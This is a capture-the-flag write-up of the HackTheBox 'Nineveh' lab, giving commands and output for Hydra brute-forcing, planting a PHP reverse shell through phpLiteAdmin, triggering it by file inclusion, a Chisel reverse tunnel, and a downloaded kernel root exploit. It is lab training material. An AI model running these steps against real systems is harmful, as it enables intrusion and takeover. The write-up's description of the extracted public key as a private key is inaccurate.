HackTheBox: Nineveh

The first step was to run Nmap against the Nineveh machine:

# Nmap 7.91 scan initiated Thu Dec 31 08:51:45 2020 as: nmap -oN scan -sC -O -sV -p-
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 filtered ports
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.12 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%), Linux 4.2 (91%), Linux 4.4 (91%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 31 08:56:11 2020 -- 1 IP address (1 host up) scanned in 267.01 seconds

Both ports 80 and 443 appears to be open. I started by browsing to port 80and was presented with the following login page.

I ran Hydra against this login form to see if it had weak credentials:

└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=admin&password=^PASS^&Login=Login:invalid"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-31 09:45:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://^PASS^&Login=Login:invalid

[STATUS] 2618.00 tries/min, 2618 tries in 00:01h, 14341781 to do in 91:19h, 16 active
[80][http-post-form] host:   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-31 09:47:44

As you can see from the output, I used the RockYou wordlist and the password 1q2w3e4r5t was found for the username admin. I then logged into the admin panel.

The admin interface only contained a single page which included the following note:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.

This not was pulled from a text file stored on the webserver. This was evident by looking at the page URL and seeing the txt file ninevehNotes.txt included

Because there was no more contents on this page for now, I decided to move onto the site hosted on port 443.

This page contains a single image. I ran GoBuster against this page and discovered the db directory:

└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt --url -k                                 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/01/03 10:33:22 Starting gobuster
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/db (Status: 301)
/server-status (Status: 403)
2021/01/03 10:34:22 Finished

Browsing to this directory brings me to a phpLiteAdmin 1.9 login form.

I then ran Hydra against this login form and discovered password123 was being used.

└─# hydra https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 10:55:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect

[443][http-post-form] host:   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-02 10:56:16

With this password i was successfully able to login to the phpLiteAdmin web interface. I discovered an exploit HERE which allows you to create a new database with a php extension, which you can then execute as remote code. I followed the instructions and created a database from the phpLiteAdmin web interface called test.php. I then opened the table and opened the insert tab and copied the code from /usr/share/webshells/php/ php-reverse-shell.php found by default in Kali. making sure to modify the IP address in the script to match my own. I then inserted this into the database.

By going back to the homepage we can see that the database file (test.php) is stored in /var/tmp/test.php

Now a method is needed to execute this file. I started by starting a netcast listner on port 1234 to capture the reverse shell:

└─# nc -nvlp 1234        
listening on [any] 1234 ...

I went back to the page hosted on port 80 and modified the URL using directory traversal to execute /var/tmp/test.php rather than files/ninevehNotes.txt. by browsing to the following URL:

This however would not work and kept reporting “No Note is selected”. I did find however that if the filename ninevehNotes is included in the request then a different error is shown:

Warning:  include(files/ninevehNotes.tx): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31

Warning:  include(): Failed opening 'files/ninevehNotes.tx' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31

Because of this, I browsed back to the phpLiteAdmin interface and renamed the database to ninevehNotes.php. I then made a request to:

This worked successfully and a reverse shell was captured.

└─# nc -nvlp 1234        
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49624
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 08:35:53 up  3:36,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

I did some browsing around the machine and found that there was a secure_notes folder in /var/www/ssl/secure_notes.

$ dir
index.html  nineveh.png
$ pwd

This page contains the following image:

I downloaded this image to the kali machine with wget and ran strings against it.

└─# strings nineveh.png  

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

As you can see from the output, embedded in the image is a private RSA key. I extracted this key out of the file and saved it as nin.pub to be used later on.

I next did some more investigation through the reverse shell and found that it was listening on port 22, even though this wasn’t detected by the initial Nmap scan.

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0    *               LISTEN      off (0.00/0/0)
tcp        0      0    *               LISTEN      off (0.00/0/0)
tcp        0      0   *               LISTEN      off (0.00/0/0)
tcp        0      0        ESTABLISHED off (0.00/0/0)
tcp        0      0       TIME_WAIT   timewait (51.58/0/0)
tcp        0      0       ESTABLISHED keepalive (7203.23/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0              ESTABLISHED off (0.00/0/0)
udp        0      0              ESTABLISHED off (0.00/0/0)
Active UNIX domain sockets (servers and established)

I decided to forward this port to my Kali machine so it can be accessed and logged into using the previously captured private key.  I started a Chisel server on the kali machine:

└─# ./chisel_1.7.3_linux_amd64 server -p 2700 -reverse -v
2021/01/03 09:36:34 server: Reverse tunnelling enabled
2021/01/03 09:36:34 server: Fingerprint +Vgh/6RQNjjkwJCxTcS9GahcQIIBe9BrBOVhaMH9gZs=
2021/01/03 09:36:34 server: Listening on

I then downloaded the Chisel client to the Nineveh machine and executed that forwarded port 22 to my kali machine on port 2800:

$ ./chisel_1.7.3_linux_amd64 client R:2800:
2021/01/03 08:36:14 client: Connecting to ws://
2021/01/03 08:36:40 client: Connected (Latency 26.49034ms)

I then logged into the fowarded SSH port from Kali using the nin.pub private key captured before:

└─# ssh -i nin.pub amrois@ -p 2800
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

287 packages can be updated.
206 updates are security updates.

You have mail.
Last login: Mon Jul  3 00:19:59 2017 from
amrois@nineveh:~$ ls
amrois@nineveh:~$ cat user.txt 

As you can see, this was successful and was able to capture the user flag. The next step was to esclate privilages. By running “uname -r” I was able to identify the Linux kernel version as 4.4.0-62-generic. There is an exploit available for this kernel that allows privilage exclation. I downloaded the exploit to the Nineveh machine and ran it.

amrois@nineveh:/tmp$ wget
--2021-01-03 09:21:39--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘comp’

comp                                                       100%[=======================================================================================================================================>]  17.46K  --.-KB/s    in 0.02s   

2021-01-03 09:21:39 (728 KB/s) - ‘comp’ saved [17880/17880]

amrois@nineveh:/tmp$ chmod +x comp
amrois@nineveh:/tmp$ ./comp
task_struct = ffff880039eb3800
uidptr = ffff88003c7f6d84
spawning root shell

root@nineveh:/tmp# cd /root/

root@nineveh:/root# cd Desktop

root@nineveh:/root# ls
root.txt  test.txt  vulnScan.sh

root@nineveh:/root# cat root.txt

As you can see from the output, this exploit was successful and I was able to capture the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *